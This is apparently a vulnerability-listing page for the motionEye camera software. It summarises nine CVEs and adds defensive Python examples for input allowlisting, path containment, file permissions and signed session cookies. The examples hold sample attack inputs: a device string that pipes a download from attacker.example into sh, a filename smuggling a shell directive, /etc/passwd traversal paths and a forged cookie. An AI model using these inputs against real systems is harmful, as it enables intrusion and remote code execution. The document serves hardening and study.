motionEye Project / motionEye vulnerabilities
9 known vulnerabilities affecting motioneye_project/motioneye.
Total CVEs: 9
CISA KEV: 0
Public exploits: 2
Exploited in wild: 0
Severity breakdown: CRITICAL 1, HIGH 6, MEDIUM 2
Vulnerabilities
CVE-2025-60787 | P2 | HIGH | CVSS 7.2 | public PoC | versions: v0.42.1, v0.43.1 | published 2025-10-03
CVE-2025-60787 [HIGH] CWE-20
MotionEye v0.43.1b4 and before is vulnerable to OS Command Injection in configuration parameters such as image_file_name. Unsanitized user input is written to Motion configuration files, allowing remote authenticated attackers with admin access to achieve code execution when Motion is restarted.
Sources: GHSA, NVD, OSV
CVE-2022-25568 | P3 | HIGH | CVSS 7.5 | public PoC | affected: ≤ 0.42.1 | published 2022-03-24
CVE-2022-25568 [HIGH] CWE-1188
MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.
Sources: GHSA, NVD, OSV
CVE-2026-55488 | P3 | HIGH | affected: ≥ 0, < 0.44.0 | published 2026-06-23
CVE-2026-55488 [HIGH] CWE-22 motionEye's Absolute Path Traversal in Media File Handlers Allows Arbitrary File Read
### Summary
motionEye contains an absolute path traversal vulnerability in multiple media file handlers that allows an attacker to read arbitrary files from the filesystem.
The affected handlers accept a user-controlled filename parameter and construct filesystem paths using `os.path.join()`. When an
Sources: GHSA
CVE-2025-47782 | P3 | HIGH | affected: ≥ 0.43.1b1, < 0.43.1b4 | published 2025-05-15
CVE-2025-47782 [HIGH] CWE-78 motionEye vulnerable to RCE in add_camera Function Due to unsafe command execution
### Summary
Using a constructed (camera) device path with the `config/add`/`add_camera` motionEye web API allows an attacker with motionEye admin user credentials to execute arbitrary UNIX shell code in a non-interactive shell, running as the user that executes the motionEye instance (`motion` by default).
#### functio
Sources: GHSA, OSV
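The two command-injection entries above (CVE-2025-60787 and CVE-2025-47782) share a root cause: an admin-supplied string reaches a shell, either directly when a camera is added or later through the motion configuration file. The Python below is an added illustration and is not motionEye's or motion's code. It places the interpolated shell-string anti-pattern next to a hardened version that allowlists the device path and passes it as a single argv element with no shell, and adds a config-line writer that rejects newlines and shell metacharacters instead of trying to escape them. The `v4l2-ctl` invocation, the `image_file_name` allowlist and the two malicious inputs are constructed for the example.

```python
import re
import subprocess

# Constructed attacker-controlled inputs for the demonstration (not taken from any report).
MALICIOUS_DEVICE = "/dev/video0; curl http://attacker.example/x | sh"
MALICIOUS_FILENAME = "%Y-%m-%d\non_picture_save /bin/sh -c 'id > /tmp/pwned'"

# Allowlists: a V4L2 device node, and a motion-style file name pattern made of
# %-conversion specifiers plus a conservative path alphabet. No whitespace, quotes,
# newlines or shell metacharacters can get through either one. (This guards against
# command injection only; escaping the media directory is a separate check.)
DEVICE_RE = re.compile(r"/dev/video\d{1,3}")
FILENAME_RE = re.compile(r"(?:[A-Za-z0-9_./-]|%[A-Za-z])+")
KEY_RE = re.compile(r"[a-z_]+")


def build_probe_command_unsafe(device: str) -> str:
    """Anti-pattern: a shell command assembled by string interpolation. Handed to
    subprocess.run(..., shell=True) or os.system, everything after the ';' in
    MALICIOUS_DEVICE would run as the motion user."""
    return f"v4l2-ctl --device={device} --list-formats-ext"


def is_valid_device(device: str) -> bool:
    return DEVICE_RE.fullmatch(device) is not None


def build_probe_command(device: str) -> list[str]:
    """Hardened: allowlist the value, then return an argv list. With shell=False the
    device string is exactly one argument to v4l2-ctl and is never parsed as shell syntax."""
    if not is_valid_device(device):
        raise ValueError(f"rejected device path: {device!r}")
    return ["v4l2-ctl", f"--device={device}", "--list-formats-ext"]


def probe_device(device: str) -> subprocess.CompletedProcess:
    """Run the hardened command. Needs v4l2-ctl installed; not exercised by the checks below."""
    return subprocess.run(build_probe_command(device), capture_output=True, text=True, check=False)


def is_valid_filename(value: str) -> bool:
    return FILENAME_RE.fullmatch(value) is not None


def render_config_line(key: str, value: str) -> str:
    """Hardened writer for one `key value` line of a motion-style config file.
    A newline in the value would let the caller smuggle in a whole new directive
    (the second line of MALICIOUS_FILENAME), so it is rejected, along with anything
    else outside the allowlist, rather than escaped."""
    if KEY_RE.fullmatch(key) is None:
        raise ValueError(f"rejected config key: {key!r}")
    if not is_valid_filename(value):
        raise ValueError(f"rejected value for {key}: {value!r}")
    return f"{key} {value}\n"


if __name__ == "__main__":
    print(build_probe_command_unsafe(MALICIOUS_DEVICE))  # the injected command survives intact
    print(build_probe_command("/dev/video0"))
    print(render_config_line("image_file_name", "%Y-%m-%d/%H-%M-%S-%q"), end="")
    for bad in (MALICIOUS_DEVICE, "../dev/video0", "/dev/video0 "):
        print(repr(bad), "valid device:", is_valid_device(bad))
    print("malicious filename valid:", is_valid_filename(MALICIOUS_FILENAME))
```

The allowlist is deliberately narrow: it is far easier to widen a regex when a legitimate file-name pattern is refused than to enumerate every character a shell or the config parser treats specially.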
CVE-2021-44255 | P3 | HIGH | CVSS 7.2 | fixed in 0.42.1 | published 2022-01-31
CVE-2021-44255 [HIGH] CWE-306
Authenticated remote code execution in MotionEye <= 0.42.1 and motionEyeOS <= 20200606 allows a remote attacker to upload a configuration backup file containing a malicious Python pickle, which executes arbitrary code on the server when it is deserialized.
Sources: GHSA, NVD, OSV
CVE-2026-31978 | P3 | MEDIUM | affected: ≥ 0, < 0.44.0 | published 2026-06-22
CVE-2026-31978 [MEDIUM] CWE-22 motionEye has an Arbitrary File Read via Path Traversal in Picture/Movie Preview Endpoint
### Summary
motionEye v0.43.1 (latest stable) is vulnerable to path traversal in the picture and movie API endpoints, like `/picture/{id}/preview/(unknown)`. Neither the API handlers, nor the `mediafiles.py` functions like `get_media_preview()` check for `..` sequences in the filename
Sources: GHSA
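Both path-traversal entries (CVE-2026-55488 and CVE-2026-31978) come down to two properties of `os.path.join()`: an absolute second argument discards everything before it, and `..` components are kept verbatim. The Python below is an added example, not motionEye's `mediafiles.py`; the media root and the file names are constructed. It shows the naive join beside a `safe_media_path()` that refuses absolute names, resolves the candidate with `realpath()` (which collapses `..` and follows symlinks) and then checks containment on the resolved result. It also shows why a purely lexical check is not enough once a symlink is involved.

```python
import os
import tempfile

# Constructed media root for the example; motionEye's real layout is not assumed.
MEDIA_ROOT = "/var/lib/motioneye/Camera1"


def naive_media_path(root: str, name: str) -> str:
    """Vulnerable: os.path.join drops every earlier component when `name` is absolute
    (absolute path traversal), and leaves '..' components untouched."""
    return os.path.join(root, name)


def safe_media_path(root: str, name: str) -> str:
    """Return the resolved path of `name` inside `root`, or raise ValueError."""
    if not name or "\x00" in name:
        raise ValueError("empty or NUL-containing file name")
    if os.path.isabs(name):
        raise ValueError(f"absolute path not allowed: {name!r}")
    root_real = os.path.realpath(root)
    # realpath collapses '..' and follows symlinks, so the containment check is made
    # on what the kernel would actually open, not on the string the client sent.
    candidate = os.path.realpath(os.path.join(root_real, name))
    if candidate == root_real or os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError(f"path escapes media root: {name!r}")
    return candidate


def is_safe_media_name(root: str, name: str) -> bool:
    try:
        safe_media_path(root, name)
        return True
    except ValueError:
        return False


def lexical_check_passes(root: str, name: str) -> bool:
    """A common but insufficient fix: normalise the string and compare prefixes.
    It stops '..' and absolute names, but knows nothing about symlinks on disk."""
    candidate = os.path.normpath(os.path.join(root, name))
    return candidate.startswith(os.path.normpath(root) + os.sep)


def demo_symlink_escape() -> dict:
    """Build a media directory holding a symlink to a file outside it (all constructed
    in a temp dir) and compare what the two checks say about 'preview.jpg'."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "media")
        os.mkdir(root)
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w") as f:
            f.write("constructed secret\n")
        os.symlink(secret, os.path.join(root, "preview.jpg"))
        return {
            "lexical": lexical_check_passes(root, "preview.jpg"),   # True: string looks fine
            "realpath": is_safe_media_name(root, "preview.jpg"),   # False: resolves outside root
        }


if __name__ == "__main__":
    for name in ("/etc/passwd", "../../../../etc/passwd", "2026-06-22/12-00-00.jpg"):
        print(f"{name!r}: naive -> {naive_media_path(MEDIA_ROOT, name)!r}, "
              f"safe -> {is_safe_media_name(MEDIA_ROOT, name)}")
    print(demo_symlink_escape())
```

Rejecting absolute names explicitly, before the `realpath()` step, keeps the error message honest; without it the `join()` would silently swallow the root and the containment check would reject the result for a less obvious reason.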
CVE-2026-32315 | P3 | HIGH | CVSS 7.2 | affected: ≥ 0, < 0.44.0 | published 2026-06-22
CVE-2026-32315 [HIGH] CWE-732 motionEye's World-Readable Configuration File Exposes Admin Password Hash
## Summary
motionEye v0.43.1 and prior versions create the configuration file `/etc/motioneye/motion.conf` with `644` permissions (`-rw-r--r--`), making it readable by any local user on the system. This file contains sensit
Sources: GHSA
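The CWE-732 entry above is about the mode a configuration file is created with. The Python below is an added example, not motionEye's code: it contrasts a plain `open()`, which creates files at 0666 masked by the process umask (so 0644 under the usual 022), with a writer that passes an explicit 0600 to `os.open()` and then calls `fchmod()`, because the mode argument to `O_CREAT` only applies when the file did not already exist. The file content is a constructed placeholder, not motion.conf syntax.

```python
import os
import stat
import tempfile

# Constructed placeholder content; the point is the file mode, not motion.conf syntax.
# The hash is SHA-256("password"), used here only as sample data.
SAMPLE_CONF = (
    "# constructed sample\n"
    "admin_password_hash 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8\n"
)


def write_config_insecure(path: str, text: str) -> None:
    """Anti-pattern: open() creates the file as 0666 & ~umask (0644 with umask 022),
    so every local user can read the credential material inside."""
    with open(path, "w") as f:
        f.write(text)


def write_config(path: str, text: str) -> None:
    """Hardened: create with an explicit 0600 mode and repair a pre-existing file."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    try:
        # The mode passed to os.open only applies when the file is created; a file
        # that already existed as 0644 keeps that mode, so tighten it on the descriptor.
        os.fchmod(fd, 0o600)
    except OSError:
        os.close(fd)
        raise
    with os.fdopen(fd, "w") as f:
        f.write(text)


def file_mode(path: str) -> int:
    """Permission bits only (e.g. 0o644), without the file-type bits."""
    return stat.S_IMODE(os.stat(path).st_mode)


def is_world_readable(path: str) -> bool:
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def demo() -> dict:
    """Write the sample with both writers under umask 022 and report the modes.
    Also rewrites the insecure file with the hardened writer to show the repair."""
    old_umask = os.umask(0o022)
    try:
        with tempfile.TemporaryDirectory() as tmp:
            insecure = os.path.join(tmp, "motion-insecure.conf")
            secure = os.path.join(tmp, "motion-secure.conf")
            write_config_insecure(insecure, SAMPLE_CONF)
            write_config(secure, SAMPLE_CONF)
            result = {
                "insecure_mode": file_mode(insecure),
                "secure_mode": file_mode(secure),
                "insecure_world_readable": is_world_readable(insecure),
                "secure_world_readable": is_world_readable(secure),
            }
            write_config(insecure, SAMPLE_CONF)  # same path, existing 0644 file: now 0600
            result["repaired_mode"] = file_mode(insecure)
            return result
    finally:
        os.umask(old_umask)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, oct(value) if isinstance(value, int) and not isinstance(value, bool) else value)
```

A deployment check that goes with this is a one-liner such as `stat -c '%a %U %n' /etc/motioneye/motion.conf` in a post-install script, failing if the mode is anything other than 600 (or 640 with a dedicated group).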
CVE-2026-55863 | MEDIUM | affected: ≥ 0, < 0.44.0 | published 2026-06-23
CVE-2026-55863 [MEDIUM] CWE-862 motionEye's missing authentication on ActionHandler allows unauthenticated camera action execution
## Summary
The `ActionHandler.post()` method in motionEye has no authentication decorator, allowing any unauthenticated attacker to trigger camera actions including snapshots, recording start/stop, and configured action scripts (PTZ controls, alarm triggers, etc.).
#
Sources: GHSA
CVE-2026-46488 | CRITICAL | affected: ≥ 0, < 0.44.0 | published 2026-06-22
CVE-2026-46488 [CRITICAL] CWE-256 motionEye: Authentication possible via password hash
### Summary
An authentication bypass vulnerability exists due to improper trust in client-controlled cookies. The application accepts user-supplied cookie values containing a username and password-hash-derived value as sufficient authentication material. These cookies can be set or modified prior to login, allowing an unauthenticated attacker to impersonate
Sources: GHSA
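The last two entries describe the two halves of an authentication failure: a session credential the client can fabricate from material it already has (CVE-2026-46488), and a handler with no authentication check at all (CVE-2026-55863). The Python below is an added example, not motionEye's code or its Tornado handlers; the cookie layout, the `require_auth` decorator, the `Request` stand-in and the sample password hash are constructed for the illustration. It issues a session cookie as an HMAC-SHA256 over a username and expiry under a server-side secret, verifies it with a constant-time comparison before trusting any claim, shows that a cookie built from knowledge of the password hash alone is rejected, and contrasts a decorated action handler with an undecorated one that accepts anonymous requests.

```python
import base64
import functools
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# Per-process secret for the example. A real service keeps this in protected storage
# so sessions survive restarts; its whole value lies in attackers not being able to read it.
SERVER_SECRET = secrets.token_bytes(32)
SESSION_TTL = 3600


def b64encode_nopad(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64decode_nopad(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_session_cookie(username: str, secret: bytes, now: Optional[float] = None,
                         ttl: int = SESSION_TTL) -> str:
    """Cookie = b64(payload) '.' b64(HMAC-SHA256(secret, payload)).
    The payload names the user and an expiry; nothing password-derived is included,
    so knowing a password hash gives an attacker nothing to replay."""
    now = time.time() if now is None else now
    payload = json.dumps({"u": username, "exp": int(now) + ttl}, separators=(",", ":")).encode()
    sig = hmac.new(secret, payload, hashlib.sha256).digest()
    return f"{b64encode_nopad(payload)}.{b64encode_nopad(sig)}"


def verify_session_cookie(cookie: str, secret: bytes, now: Optional[float] = None) -> Optional[str]:
    """Return the username for a valid, unexpired cookie, else None.
    The MAC is checked first, in constant time; only then are the claims parsed."""
    now = time.time() if now is None else now
    try:
        payload_b64, sig_b64 = cookie.split(".", 1)
        payload = b64decode_nopad(payload_b64)
        sig = b64decode_nopad(sig_b64)
    except ValueError:  # wrong shape or bad base64 (binascii.Error is a ValueError)
        return None
    expected = hmac.new(secret, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        return None
    try:
        claims = json.loads(payload)
    except ValueError:
        return None
    if not isinstance(claims, dict) or not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        return None
    user = claims.get("u")
    return user if isinstance(user, str) and user else None


def forge_cookie_without_secret(username: str, known_password_hash: str) -> str:
    """What an attacker who learned the password hash (say, from a world-readable config
    file) but not SERVER_SECRET can build: a well-formed cookie keyed with the wrong
    material. verify_session_cookie rejects it because the MAC does not verify."""
    payload = json.dumps({"u": username, "exp": 2**31}, separators=(",", ":")).encode()
    sig = hmac.new(known_password_hash.encode(), payload, hashlib.sha256).digest()
    return f"{b64encode_nopad(payload)}.{b64encode_nopad(sig)}"


class Request:
    """Minimal stand-in for a web framework's request object (constructed for the example)."""
    def __init__(self, cookies: Optional[dict] = None):
        self.cookies = cookies or {}
        self.user: Optional[str] = None


def require_auth(handler):
    """Gate a handler on a valid session cookie. The fix for a CWE-862 handler is to
    make sure every state-changing method carries this (or an equivalent framework hook)."""
    @functools.wraps(handler)
    def wrapper(request: Request, *args, **kwargs):
        user = verify_session_cookie(request.cookies.get("session", ""), SERVER_SECRET)
        if user is None:
            return 401, "authentication required"
        request.user = user
        return handler(request, *args, **kwargs)
    return wrapper


def action_handler_unprotected(request: Request, action: str):
    """The failure mode: no decorator, so an anonymous POST triggers the camera action."""
    return 200, f"anonymous ran {action}"


@require_auth
def action_handler(request: Request, action: str):
    return 200, f"{request.user} ran {action}"
```

Two details carry the security argument: the signature is verified before the payload is even parsed, so malformed or attacker-chosen JSON never reaches application logic unauthenticated, and the decorator is the single place authentication happens, which makes "which handlers lack it" a question a grep (or a framework-level default) can answer.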